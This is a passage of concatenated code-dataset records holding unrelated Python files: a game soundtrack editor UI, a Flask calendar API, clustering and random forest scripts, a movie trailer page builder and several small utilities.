1.5 if ba.app.med_ui else 1.0),\n stack_offset=(0, -48) if ba.app.small_ui else (\n 0, 15) if ba.app.med_ui else (0, 0)))\n cancel_button = ba.buttonwidget(parent=self._root_widget,\n position=(38 + x_inset,\n self._height - 60),\n size=(160, 60),\n autoselect=True,\n label=ba.Lstr(resource='cancelText'),\n scale=0.8)\n save_button = ba.buttonwidget(parent=self._root_widget,\n position=(self._width - (168 + x_inset),\n self._height - 60),\n autoselect=True,\n size=(160, 60),\n label=ba.Lstr(resource='saveText'),\n scale=0.8)\n ba.widget(edit=save_button, left_widget=cancel_button)\n ba.widget(edit=cancel_button, right_widget=save_button)\n ba.textwidget(\n parent=self._root_widget,\n position=(0, self._height - 50),\n size=(self._width, 25),\n text=ba.Lstr(resource=self._r +\n ('.editSoundtrackText' if existing_soundtrack\n is not None else '.newSoundtrackText')),\n color=ba.app.title_color,\n h_align='center',\n v_align='center',\n maxwidth=280)\n v = self._height - 110\n if 'Soundtracks' not in appconfig:\n appconfig['Soundtracks'] = {}\n\n self._soundtrack_name: Optional[str]\n self._existing_soundtrack_name: Optional[str]\n if existing_soundtrack is not None:\n # if they passed just a name, pull info from that soundtrack\n if isinstance(existing_soundtrack, str):\n self._soundtrack = copy.deepcopy(\n appconfig['Soundtracks'][existing_soundtrack])\n self._soundtrack_name = existing_soundtrack\n self._existing_soundtrack_name = existing_soundtrack\n self._last_edited_song_type = None\n else:\n # otherwise they can pass info on an in-progress edit\n self._soundtrack = existing_soundtrack['soundtrack']\n self._soundtrack_name = existing_soundtrack['name']\n self._existing_soundtrack_name = (\n existing_soundtrack['existing_name'])\n self._last_edited_song_type = (\n existing_soundtrack['last_edited_song_type'])\n else:\n self._soundtrack_name = None\n self._existing_soundtrack_name = None\n self._soundtrack = {}\n self._last_edited_song_type = None\n\n ba.textwidget(parent=self._root_widget,\n text=ba.Lstr(resource=self._r + '.nameText'),\n maxwidth=80,\n scale=0.8,\n position=(105 + x_inset, v + 19),\n color=(0.8, 0.8, 0.8, 0.5),\n size=(0, 0),\n h_align='right',\n v_align='center')\n\n # if there's no 
initial value, find a good initial unused name\n if existing_soundtrack is None:\n i = 1\n st_name_text = ba.Lstr(resource=self._r +\n '.newSoundtrackNameText').evaluate()\n if '${COUNT}' not in st_name_text:\n # make sure we insert number *somewhere*\n st_name_text = st_name_text + ' ${COUNT}'\n while True:\n self._soundtrack_name = st_name_text.replace(\n '${COUNT}', str(i))\n if self._soundtrack_name not in appconfig['Soundtracks']:\n break\n i += 1\n\n self._text_field = ba.textwidget(\n parent=self._root_widget,\n position=(120 + x_inset, v - 5),\n size=(self._width - (160 + 2 * x_inset), 43),\n text=self._soundtrack_name,\n h_align='left',\n v_align='center',\n max_chars=32,\n autoselect=True,\n description=ba.Lstr(resource=self._r + '.nameText'),\n editable=True,\n padding=4,\n on_return_press_call=self._do_it_with_sound)\n\n scroll_height = self._height - 180\n self._scrollwidget = scrollwidget = ba.scrollwidget(\n parent=self._root_widget,\n highlight=False,\n position=(40 + x_inset, v - (scroll_height + 10)),\n size=(self._width - (80 + 2 * x_inset), scroll_height),\n simple_culling_v=10)\n ba.widget(edit=self._text_field, down_widget=self._scrollwidget)\n self._col = ba.columnwidget(parent=scrollwidget)\n\n ba.containerwidget(edit=self._scrollwidget,\n claims_left_right=True,\n claims_tab=True,\n selection_loop_to_parent=True)\n ba.containerwidget(edit=self._col,\n claims_left_right=True,\n claims_tab=True,\n selection_loop_to_parent=True)\n\n self._song_type_buttons: Dict[str, ba.Widget] = {}\n self._refresh()\n ba.buttonwidget(edit=cancel_button, on_activate_call=self._cancel)\n ba.containerwidget(edit=self._root_widget, cancel_button=cancel_button)\n ba.buttonwidget(edit=save_button, on_activate_call=self._do_it)\n ba.containerwidget(edit=self._root_widget, start_button=save_button)\n ba.widget(edit=self._text_field, up_widget=cancel_button)\n ba.widget(edit=cancel_button, down_widget=self._text_field)\n\n def _refresh(self) -> None:\n from ba.deprecated import get_resource\n for widget in self._col.get_children():\n widget.delete()\n\n types = [\n 'Menu',\n 'CharSelect',\n 'ToTheDeath',\n 'Onslaught',\n 'Keep Away',\n 'Race',\n 'Epic Race',\n 'ForwardMarch',\n 'FlagCatcher',\n 'Survival',\n 'Epic',\n 'Hockey',\n 'Football',\n 'Flying',\n 'Scary',\n 'Marching',\n 'GrandRomp',\n 'Chosen One',\n 'Scores',\n 'Victory',\n ]\n # FIXME: We should probably convert this to use translations.\n type_names_translated = get_resource('soundtrackTypeNames')\n prev_type_button: Optional[ba.Widget] = None\n prev_test_button: Optional[ba.Widget] = None\n\n for index, song_type in enumerate(types):\n row = ba.rowwidget(parent=self._col, size=(self._width - 40, 40))\n ba.containerwidget(edit=row,\n claims_left_right=True,\n claims_tab=True,\n selection_loop_to_parent=True)\n type_name = type_names_translated.get(song_type, song_type)\n ba.textwidget(parent=row,\n size=(230, 25),\n always_highlight=True,\n text=type_name,\n scale=0.7,\n h_align='left',\n v_align='center',\n maxwidth=190)\n\n if song_type in self._soundtrack:\n entry = self._soundtrack[song_type]\n else:\n entry = None\n\n if entry is not None:\n # make sure they don't muck with this after it gets to us\n entry = copy.deepcopy(entry)\n\n icon_type = self._get_entry_button_display_icon_type(entry)\n self._song_type_buttons[song_type] = btn = ba.buttonwidget(\n parent=row,\n size=(230, 32),\n label=self._get_entry_button_display_name(entry),\n text_scale=0.6,\n on_activate_call=ba.Call(self._get_entry, song_type, entry,\n 
type_name),\n icon=(self._file_tex if icon_type == 'file' else\n self._folder_tex if icon_type == 'folder' else None),\n icon_color=(1.1, 0.8, 0.2) if icon_type == 'folder' else\n (1, 1, 1),\n left_widget=self._text_field,\n iconscale=0.7,\n autoselect=True,\n up_widget=prev_type_button)\n if index == 0:\n ba.widget(edit=btn, up_widget=self._text_field)\n ba.widget(edit=btn, down_widget=btn)\n\n if (self._last_edited_song_type is not None\n and song_type == self._last_edited_song_type):\n ba.containerwidget(edit=row,\n selected_child=btn,\n visible_child=btn)\n ba.containerwidget(edit=self._col,\n selected_child=row,\n visible_child=row)\n ba.containerwidget(edit=self._scrollwidget,\n selected_child=self._col,\n visible_child=self._col)\n ba.containerwidget(edit=self._root_widget,\n selected_child=self._scrollwidget,\n visible_child=self._scrollwidget)\n\n if prev_type_button is not None:\n ba.widget(edit=prev_type_button, down_widget=btn)\n prev_type_button = btn\n ba.textwidget(parent=row, size=(10, 32), text='') # spacing\n btn = ba.buttonwidget(\n parent=row,\n size=(50, 32),\n label=ba.Lstr(resource=self._r + '.testText'),\n text_scale=0.6,\n on_activate_call=ba.Call(self._test, ba.MusicType(song_type)),\n up_widget=prev_test_button\n if prev_test_button is not None else self._text_field)\n if prev_test_button is not None:\n ba.widget(edit=prev_test_button, down_widget=btn)\n ba.widget(edit=btn, down_widget=btn, right_widget=btn)\n prev_test_button = btn\n\n @classmethod\n def _restore_editor(cls, state: Dict[str, Any], musictype: str,\n entry: Any) -> None:\n music = ba.app.music\n\n # Apply the change and recreate the window.\n soundtrack = state['soundtrack']\n existing_entry = (None if musictype not in soundtrack else\n soundtrack[musictype])\n if existing_entry != entry:\n ba.playsound(ba.getsound('gunCocking'))\n\n # Make sure this doesn't get mucked with after we get it.\n if entry is not None:\n entry = copy.deepcopy(entry)\n\n entry_type = music.get_soundtrack_entry_type(entry)\n if entry_type == 'default':\n # For 'default' entries simply exclude them from the list.\n if musictype in soundtrack:\n del soundtrack[musictype]\n else:\n soundtrack[musictype] = entry\n\n ba.app.main_menu_window = (cls(state,\n transition='in_left').get_root_widget())\n\n def _get_entry(self, song_type: str, entry: Any,\n selection_target_name: str) -> None:\n music = ba.app.music\n if selection_target_name != '':\n selection_target_name = \"'\" + selection_target_name + \"'\"\n state = {\n 'name': self._soundtrack_name,\n 'existing_name': self._existing_soundtrack_name,\n 'soundtrack': self._soundtrack,\n 'last_edited_song_type': song_type\n }\n ba.containerwidget(edit=self._root_widget, transition='out_left')\n ba.app.main_menu_window = (music.get_music_player().select_entry(\n ba.Call(self._restore_editor, state, song_type), entry,\n selection_target_name).get_root_widget())\n\n def _test(self, song_type: ba.MusicType) -> None:\n music = ba.app.music\n\n # Warn if volume is zero.\n if ba.app.config.resolve('Music Volume') < 0.01:\n ba.playsound(ba.getsound('error'))\n ba.screenmessage(ba.Lstr(resource=self._r +\n '.musicVolumeZeroWarning'),\n color=(1, 0.5, 0))\n music.set_music_play_mode(ba.MusicPlayMode.TEST)\n music.do_play_music(song_type,\n mode=ba.MusicPlayMode.TEST,\n testsoundtrack=self._soundtrack)\n\n def _get_entry_button_display_name(self,\n entry: Any) -> Union[str, ba.Lstr]:\n music = ba.app.music\n etype = music.get_soundtrack_entry_type(entry)\n ename: Union[str, ba.Lstr]\n if 
etype == 'default':\n ename = ba.Lstr(resource=self._r + '.defaultGameMusicText')\n elif etype in ('musicFile', 'musicFolder'):\n ename = os.path.basename(music.get_soundtrack_entry_name(entry))\n else:\n ename = music.get_soundtrack_entry_name(entry)\n return ename\n\n def _get_entry_button_display_icon_type(self, entry: Any) -> Optional[str]:\n music = ba.app.music\n etype = music.get_soundtrack_entry_type(entry)\n if etype == 'musicFile':\n return 'file'\n if etype == 'musicFolder':\n return 'folder'\n return None\n\n def _cancel(self) -> None:\n from bastd.ui.soundtrack import browser as stb\n music = ba.app.music\n\n # Resets music back to normal.\n music.set_music_play_mode(ba.MusicPlayMode.REGULAR)\n ba.containerwidget(edit=self._root_widget, transition='out_right')\n ba.app.main_menu_window = (stb.SoundtrackBrowserWindow(\n transition='in_left').get_root_widget())\n\n def _do_it(self) -> None:\n from bastd.ui.soundtrack import browser as stb\n music = ba.app.music\n cfg = ba.app.config\n new_name = cast(str, ba.textwidget(query=self._text_field))\n if (new_name != self._soundtrack_name\n and new_name in cfg['Soundtracks']):\n ba.screenmessage(\n ba.Lstr(resource=self._r + '.cantSaveAlreadyExistsText'))\n ba.playsound(ba.getsound('error'))\n return\n if not new_name:\n ba.playsound(ba.getsound('error'))\n return\n if new_name == ba.Lstr(resource=self._r +\n '.defaultSoundtrackNameText').evaluate():\n ba.screenmessage(\n ba.Lstr(resource=self._r + '.cantOverwriteDefaultText'))\n ba.playsound(ba.getsound('error'))\n return\n\n # Make sure config exists.\n if 'Soundtracks' not in cfg:\n cfg['Soundtracks'] = {}\n\n # If we had an old one, delete it.\n if (self._existing_soundtrack_name is not None\n and self._existing_soundtrack_name in cfg['Soundtracks']):\n del cfg['Soundtracks'][self._existing_soundtrack_name]\n cfg['Soundtracks'][new_name] = self._soundtrack\n cfg['Soundtrack'] = new_name\n\n cfg.commit()\n ba.playsound(ba.getsound('gunCocking'))\n ba.containerwidget(edit=self._root_widget, transition='out_right')\n\n # Resets music back to normal.\n music.set_music_play_mode(ba.MusicPlayMode.REGULAR, force_restart=True)\n\n ba.app.main_menu_window = (stb.SoundtrackBrowserWindow(\n transition='in_left').get_root_widget())\n\n def _do_it_with_sound(self) -> None:\n ba.playsound(ba.getsound('swish'))\n self._do_it()\n","sub_path":"assets/src/ba_data/python/bastd/ui/soundtrack/edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":18137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"131811198","text":"from cx_Freeze import setup, Executable\n\nbuildOptions = dict(include_files = ['data/'])\n\nsetup(\n name = \"Beyond the game\",\n version = \"0.0.1\",\n description = '',\n options = dict(build_exe = buildOptions),\n executables = [Executable(\"main.py\")]\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"43047574","text":"import sys\nsys.path.append('../_tvblibrary/')\nsys.path.append('../_tvbdata/')\nfrom tvb.simulator.lab import *\n\ndef initintegrator(heun_ts, noise_cov, noiseon=True):\n ####################### 3. 
Integrator for Models ##########################\n # define cov noise for the stochastic heun integrato\n hiss = noise.Additive(nsig=noise_cov)\n\n if noiseon:\n heunint = integrators.HeunStochastic(dt=heun_ts, noise=hiss)\n else:\n heunint = integrators.HeunDeterministic(dt=heun_ts)\n\n return heunint","sub_path":"hackcambridge/forwardsim/tvbsim/initializers/integrators.py","file_name":"integrators.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"49807625","text":"import media\r\nimport fresh_tomatoes\r\nimport urllib\r\nimport json\r\n\r\n\r\ndef get_info(movie_name):\r\n # Get a response after opening the URL\r\n response = urllib.urlopen(\"http://www.omdbapi.com/?t=\"+movie_name+\r\n \"&y=&plot=short&r=json\")\r\n # Data from the website in the form of JSON is recieved\r\n output = response.read()\r\n # Parsing Values from JSON data\r\n wjdata = json.loads(output)\r\n return wjdata\r\n\r\n# get_info method takes the Movie name as the argument\r\n# and stores the returned data in info variable\r\ninfo = get_info(\"Batman v Superman: Dawn of Justice\")\r\n# Constructor of Movie Class takes title, description, image URL\r\n# and YouTube Link of the trailer as argument\r\nbat_vs_sup = media.Movie(info['Title'], info['Plot'], info['Poster'],\r\n \"https://www.youtube.com/watch?v=fis-9Zqu2Ro\")\r\n\r\ninfo = get_info(\"Ice Age: Collision Course\")\r\ntarzan = media.Movie(info['Title'], info['Plot'], info['Poster'],\r\n \"https://www.youtube.com/watch?v=Aj7ty6sViiU\")\r\n\r\ninfo = get_info(\"Captain America: Civil War\")\r\ncapt_america = media.Movie(info['Title'], info['Plot'], info['Poster'],\r\n \"https://www.youtube.com/watch?v=dKrVegVI0Us\")\r\n\r\ninfo = get_info(\"Suicide Squad\")\r\nsuicide = media.Movie(info['Title'], info['Plot'], info['Poster'],\r\n \"https://www.youtube.com/watch?v=CmRih_VtVA\")\r\n\r\ninfo = get_info(\"Doctor Strange\")\r\ndoc_strange = media.Movie(info['Title'], info['Plot'], info['Poster'],\r\n \"https://www.youtube.com/watch?v=HSzx-zryEgM\")\r\n\r\ninfo = get_info(\"Deadpool\")\r\ndeadpool = media.Movie(info['Title'], info['Plot'], info['Poster'],\r\n \"https://www.youtube.com/watch?v=gtTfd6tISfw\")\r\n\r\n# Array of Movie objects\r\nmovies = [bat_vs_sup, tarzan, capt_america, suicide, doc_strange, deadpool]\r\n# movies array is passed to open_movies_page function to load\r\n# the webpage with the information provided\r\nfresh_tomatoes.open_movies_page(movies)\r\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"571817257","text":"import gym\nimport signal\nimport sys\nimport os\nimport numpy as np\n\nfrom baselines import deepq\n\nimport argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-fn\", \"--filename\", type=str, default = \"FPcav_model.pkl\",\n help=\"Deep Q Learning model file\")\nargs = parser.parse_args()\n\n\n\n#### this catches the Ctrl-C\ndef signal_handler(signal, frame):\n print('...user interrupt detected...')\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n###\n\n\ndef main():\n env = gym.make(\"simplePendulum-v1\")\n funame = args.filename\n act = deepq.load(funame)\n otim = os.stat(funame).st_mtime\n\n while True:\n mtim = os.stat(funame).st_mtime\n if mtim != otim:\n #act = None\n \n #act = deepq.load(funame)\n print(\"Loaded new 
controller...\")\n obs, done = env.reset(), False\n episode_rew = 0\n nsteps = 0\n while nsteps < 500:\n env.render()\n obs, rew, done, _ = env.step(act(obs[None])[0])\n episode_rew += rew\n nsteps += 1\n print(\"Episode reward = \", round(episode_rew,2))\n #print(\"Angle = {0:2.2f} deg, Vel = {1:2.2f} deg/s, Torque = {2:2.2f} N/m\".format(180/np.pi*(obs[0]), 180/np.pi*obs[1], obs[2]))\n print(\"Angle = {0:2.2f} deg, Vel = {1:2.2f} deg/s\".format(\n 180/np.pi*np.arccos(obs[0]), 180/np.pi*obs[2]))\n print(\" \")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"baselines/deepq/experiments/enjoyFP.py","file_name":"enjoyFP.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"484605819","text":"import numpy as np\nimport pandas as pd\nimport os\n\ndef validate_fluxes(fileName, baseDir):\n\tdata = pd.read_csv(os.path.join(baseDir, fileName))\n\tcol = list(data.columns)[-3]\n\n\tX = sorted(list(set([ round(x,5) for x in data[\"X1\"] ])))\n\tx1_in, x1_out = X[0], X[-2]\n\tx2_in, x2_out = X[1], X[-1]\n\n\tdelta = (x2_in-x1_in)/4\n\n\ts1 = sum( [ qx*(x2_in/2) for qx, x1, x2 in zip(data[ col ], data[\"X1\"], data[\"X2\"]) if abs(x1-x1_in) 0.5:\n ## saving 200 of each class\n cnt += 1\n #if label_number[np.argmax(pred)] < 200:\n # label_number[np.argmax(pred)] += 1\n \n #else:\n # print(pred_label, 'not saving')\n # continue\n\n\n\n ### test if the folder exists\n if not pred_label in os.listdir(save_path):\n os.mkdir(save_path + pred_label)\n cv2.imwrite(save_path + pred_label + '\\\\' + str(cnt)+'.jpg', image)\n\n \n \n\n else:\n cv2.imwrite(save_path + pred_label + '\\\\' + str(cnt)+'.jpg', image)\n ##update metadata\n np.save(save_path + 'metadata.npy', str(row_counter))\n\n tmp = 0\n for item in label_number:\n if item > 200:\n tmp += 1\n \n if tmp >= len(label_number):\n break\n\n\n\n \n \n \n\n #plt.figure('label: '+pred_label +' confidence: '+ str(conf))\n #plt.imshow(orig_im, cmap = 'gray')\n #plt.show()\n","sub_path":"auto_label_data.py","file_name":"auto_label_data.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"599062674","text":"\n\nfrom xai.brain.wordbase.adjectives._lazy import _LAZY\n\n#calss header\nclass _LAZIER(_LAZY, ):\n\tdef __init__(self,): \n\t\t_LAZY.__init__(self)\n\t\tself.name = \"LAZIER\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"lazy\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_lazier.py","file_name":"_lazier.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"139886531","text":"import frappe\nimport json\n# import shortuuid\nimport qrcode\nimport base64\nfrom PIL import Image\nfrom io import BytesIO\nfrom frappe import _\nfrom frappe.utils.data import today\nfrom frappe.utils import datetime, nowdate, add_days, flt\nfrom frappe.utils.print_format import download_pdf\nfrom datetime import date\n\n\n@frappe.whitelist()\ndef create_mobilization(doc, method):\n if doc.pending_for == 'Proposed PSL':\n frappe.errprint(doc.name)\n mobilization_id = frappe.db.get_value(\"Mobilization\", {\"candidate\": doc.name})\n # interview = frappe.db.get(\"Candidate\", docs.candidate)\n # if interview:\n # interview_date = interview.interview_date\n project = frappe.get_doc(\"Project\", doc.project)\n position = frappe.db.get_value(\"Position\", doc.position, 
\"subject\")\n # territory = frappe.db.get_value(\"Customer\", doc.customer, \"territory\")\n payment_terms = project.payment_terms\n if mobilization_id:\n mobilization = frappe.get_doc(\"Mobilization\", mobilization_id)\n else:\n mobilization = frappe.new_doc(\"Mobilization\")\n mobilization.update({\n \"customer\": doc.customer,\n \"territory\": territory,\n \"project\": doc.project,\n \"payment_terms\": payment_terms,\n \"position\": doc.position,\n \"candidate\": doc.name,\n \"name1\": doc.given_name,\n \"designation\": task,\n \"contact_no\": doc.mobile,\n \"current_location\": doc.current_location,\n \"passport_no\": doc.passport_no,\n \"ecr_status\": doc.ecr_status,\n \"associate_name\": doc.associate_name,\n \"associate\": doc.associate,\n \"associate_contact_no\": doc.contact_no,\n \"expiry_date\": doc.expiry_date,\n \"date_of_issue\": doc.issued_date,\n \"place_of_issue\": doc.place_of_issue,\n \"cr_executive\": project.cpc,\n \"ca_executive\": ca_executive,\n \"department\": department,\n \"source_executive\": source_executive,\n \"selection_date\": doc.interview_date,\n \"tl\": tl,\n \"degree\": doc.degree,\n \"specialization\": doc.specialization,\n \"yop\": doc.yop,\n \"basic\": doc.basic,\n \"food\": doc.food,\n \"other_allowances\": doc.other_allowances,\n \"dob\": doc.dob\n })\n \n mobilization.save(ignore_permissions=True)\n","sub_path":"apps/recruitpro/recruitpro/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"179039041","text":"\"\"\"\nEndpoints for management of calendars and events.\n\nSkylark Kraken\n(c) 2016 Coderouge\n\"\"\"\n\nimport aniso8601\n\nfrom flask import abort, Blueprint, g, jsonify, request, Response\nfrom flask.views import MethodView\n\nfrom skylark import calendars\nfrom kraken import auth\nfrom kraken.records import push_record\n\nbackend = Blueprint(\"calendars\", __name__)\n\n\nclass EventsAPI(MethodView):\n @auth.required()\n def get(self, id):\n events = calendars.get(id=id, user=g.user.name)\n if id and not events:\n abort(404)\n if isinstance(events, dict):\n return jsonify(event=events)\n else:\n return jsonify(events=events)\n\n @auth.required()\n def post(self):\n data = request.get_json()[\"event\"]\n cal = calendars.get_calendars(name=data[\"calendar\"], user=g.user.name)\n if not cal:\n abort(400)\n ev = cal.create_event(\n data[\"name\"], data[\"description\"],\n aniso8601.parse_datetime(data[\"start\"]),\n aniso8601.parse_datetime(data[\"end\"]),\n data.get(\"rrule\", \"\"), data.get(\"location\", \"\"),\n data.get(\"is_all_day\")\n )\n return jsonify(event=ev)\n\n @auth.required()\n def put(self, id):\n data = request.get_json()[\"event\"]\n cal = calendars.get_calendars(name=data[\"calendar\"], user=g.user.name)\n if not cal:\n abort(400)\n ev = cal.update_event(\n id, data[\"name\"], data[\"description\"],\n aniso8601.parse_datetime(data[\"start\"]),\n aniso8601.parse_datetime(data[\"end\"]),\n data.get(\"rrule\", \"\"), data.get(\"location\", \"\"),\n data.get(\"is_all_day\")\n )\n if not ev:\n abort(404)\n return jsonify(event=ev)\n\n @auth.required()\n def delete(self, id):\n for x in calendars.get_calendars(user=g.user.name):\n x.delete_event(id)\n return Response(status=204)\n\n\nclass CalendarsAPI(MethodView):\n @auth.required()\n def get(self, id):\n cals = calendars.get_calendars(name=id, user=g.user.name)\n if id and request.args.get(\"download\", None):\n with open(cals.path, \"r\") as f:\n data = 
f.read()\n resp = Response(data, mimetype=\"application/octet-stream\")\n resp.headers[\"Content-Length\"] = str(len(data.encode('utf-8')))\n aname = \"attachment; filename={0}.ics\".format(id)\n resp.headers[\"Content-Disposition\"] = aname\n return resp\n if id and not cals:\n abort(404)\n if isinstance(cals, calendars.Calendar):\n return jsonify(calendar=cals.serialized)\n else:\n return jsonify(calendars=[x.serialized for x in cals])\n\n @auth.required()\n def post(self):\n head = request.headers\n if head.get('Content-Type').startswith(\"application/json\"):\n data = request.get_json()[\"calendar\"]\n cal = calendars.Calendar(\n id=data[\"name\"], name=data[\"name\"], user=g.user.name,\n color=data.get(\"color\")\n )\n cal.create()\n elif head.get('Content-Type').startswith(\"multipart/form-data\"):\n name = request.form.get(\"name\")\n color = request.form.get(\"color\")\n cal_file = request.files.get(\"file\")\n cal = calendars.Calendar(\n id=name, name=name, user=g.user.name, color=color\n )\n cal.import_calendar(cal_file.read().decode())\n push_record(\"events\", [x for x in cal.serialized_events])\n else:\n abort(400)\n return jsonify(calendar=cal.serialized)\n\n @auth.required()\n def put(self, id):\n data = request.get_json()[\"calendar\"]\n cal = calendars.get_calendars(name=id, user=g.user.name)\n if not cal:\n abort(404)\n if data.get(\"color\") != cal.color:\n cal.set_color(data.get(\"color\"))\n return jsonify(calendar=cal.serialized)\n\n @auth.required()\n def delete(self, id):\n cal = calendars.get_calendars(name=id, user=g.user.name)\n if cal:\n cal.delete()\n return Response(status=204)\n\n\nevents_view = EventsAPI.as_view('events_api')\nbackend.add_url_rule('/api/events', defaults={'id': None},\n view_func=events_view, methods=['GET', ])\nbackend.add_url_rule('/api/events', view_func=events_view,\n methods=['POST', ])\nbackend.add_url_rule('/api/events/', view_func=events_view,\n methods=['GET', 'PUT', 'DELETE'])\n\ncals_view = CalendarsAPI.as_view('cals_api')\nbackend.add_url_rule('/api/calendars', defaults={'id': None},\n view_func=cals_view, methods=['GET', ])\nbackend.add_url_rule('/api/calendars', view_func=cals_view,\n methods=['POST', ])\nbackend.add_url_rule('/api/calendars/', view_func=cals_view,\n methods=['GET', 'PUT', 'DELETE'])\n","sub_path":"kraken/frameworks/calendars.py","file_name":"calendars.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"156010148","text":"import sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport debacl as dcl\nfrom sklearn.neighbors import KNeighborsClassifier\nX=np.genfromtxt('HDBSCANdClusterForDeBaCl_position.txt')\nn=len(X) #Number of atoms in the dataset\nY=np.genfromtxt('tempDeBaClparameters.txt')\np=int(Y[0])\nk=int(Y[1])\ngamma=int(Y[2])\n\n#gamma: Leaf nodes with fewer than this number (i.e., prune_threshold or \n# gamma)of members are recursively merged into larger nodes. 
\n# If 'None' (the default), then no pruning is performed.\n\nknn_graph, radii = dcl.utils.knn_graph(X, k, method='kd-tree')\ndensity = dcl.utils.knn_density(radii, n, p, k)\n\n#num_level: Number of density levels in the constructed tree.\n#If None (default), num_levels is internally set to be the number of rows in X\n#verbose: if True, a progress indicator is printed at every 100th leevl of tree construction\ntree = dcl.construct_tree_from_graph(knn_graph, density, prune_threshold=gamma,\n verbose=False)\ndef out_fun():\n return str(tree)\noutput = out_fun()\nfile = open(\"DeBaClTempOutputs/DeBaCl_treeOutput.txt\",\"w\")\nfile.write(output)\nfile.close()\n\nnp.savetxt('DeBaClTempOutputs/DeBaCl_density.txt',tree.density)\n\n#when fill_background is True, it means that\n#the label of noise points is considered as -1\nlabels = tree.get_clusters(fill_background=True)\n#The first column is the row number of the dataset(i.e., x,y,z of the atoms)\n#The second column is the label of cluster for each atom.\nnp.savetxt('DeBaClTempOutputs/DeBaCl_labels.txt',labels,fmt='%d %d')\n\nleaves = tree.get_leaf_nodes()\nlabels = tree.get_clusters()\nfig = tree.plot(form='mass', color_nodes=leaves, colormap=plt.cm.jet)[0]\n#fig.show()\nfig.savefig('DeBaClTempOutputs/DeBaCl_plot.png',dpi=(300))\n","sub_path":"Cluster analysis code/For PC/debaclImanSecond.py","file_name":"debaclImanSecond.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"611571718","text":"#! Libraries\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.cluster import KMeans\nfrom sklearn import metrics\nfrom sklearn.tree import export_graphviz\n\nimport pandas as pd\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nfrom subprocess import call\n\nfrom IPython.display import Image\n\nimport pydot\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom tqdm import tqdm\n\nimport statistics as st\n\n#! Data\n\n#* Loading dataset\niris =load_iris()\n\n#* Converting dataset to pandas dataframe\ndf = pd.DataFrame(iris.data, columns=iris.feature_names)\n\n#* Adding species column to dataframe\ndf['species']=pd.Categorical.from_codes(iris.target,iris.target_names)\n\n#* Removing rows with virginica value\ndf=df[df.species != 'virginica']\n\n#* Removing width columns from dataframe\ndf=df.drop('sepal width (cm)', axis=1)\ndf=df.drop('petal width (cm)', axis=1)\n\n#* Reseting index and mixing dataframe\ndf = df.sample(frac=1).reset_index(drop=True)\n\n#* Extracting data from the dataframe\nx, y=df.iloc[:,0].values, df.iloc[:,1].values\nx,y=x.reshape(len(x),1), y.reshape(len(y),1)\n\n#* Organizing data in an array\ndata=np.zeros([len(x),2])\ndata[:len(x),0]=x[:,0]\ndata[:len(x),1]=y[:,0]\n\n#! K - Means\n\n#! 
Elbow curve\n\n#* Evualating Kmeans with different number of clusters\nkmeans = [KMeans(n_clusters=i) for i in range(1, 5)]\n\n#* Obtaining its value and stacking in a list\nscore = [kmeans[i].fit(data).score(data) for i in range(len(kmeans))]\n\n#* Model implementation with the number of cluster determinated with the curve\nkm=KMeans(n_clusters=2)\noutput_km = km.fit_predict(data)\n\n#* Copying data frame for maintain primary data saved\ncompare=df.copy()\n\n#* Assigning labels to results \noutput_km_label=['setosa' if output_km[i] == 0 else 'versicolor' for i in range(len(output_km))]\n\nif not df.species[0] == output_km_label[0]:\n output_km_label=['versicolor' if output_km[i] == 0 else 'setosa' for i in range(len(output_km))]\n # This IF sentence is important because k-means is an unsupervised learning algorithm, so it didn't really knows if the label is right\n\n#* Stacking a column with K-Means result\ncompare['Cluster']=output_km_label\n\naccuracy=metrics.adjusted_rand_score(compare.iloc[:,2].values,output_km)\n\n\n#! Random Forest\n\n#* Creating Test and Train data\ncompare['is_train']=np.random.uniform(0,1,len(compare))<=.75\n # We are creating a random number between 0 and 1 for each row, if that number is less tan 0.75 will be true, then the 75% of data will be selected for train.\n\n#* Creating dataframes with test rows and training rows\ntrain,test = compare[compare['is_train']==True],compare[compare['is_train']==False]\n\n#* Deleting the column to keep the dataframe unchanged\ncompare = compare.drop('is_train', 1)\n\n#! Model \n\n#* Creating a random forest classifier\nclf=RandomForestClassifier(n_estimators=100,n_jobs=2,random_state=0)\n\n#* Selecting features\nfeatures = compare.columns[:2]\n\n#* Training the classifier\nclf.fit(train[features],pd.factorize(train['species'])[0])\n\n#* Applying the trained Classifier to the test\noutput_RF_t=iris.target_names[clf.predict(test[features])]\n\n#* Confussion 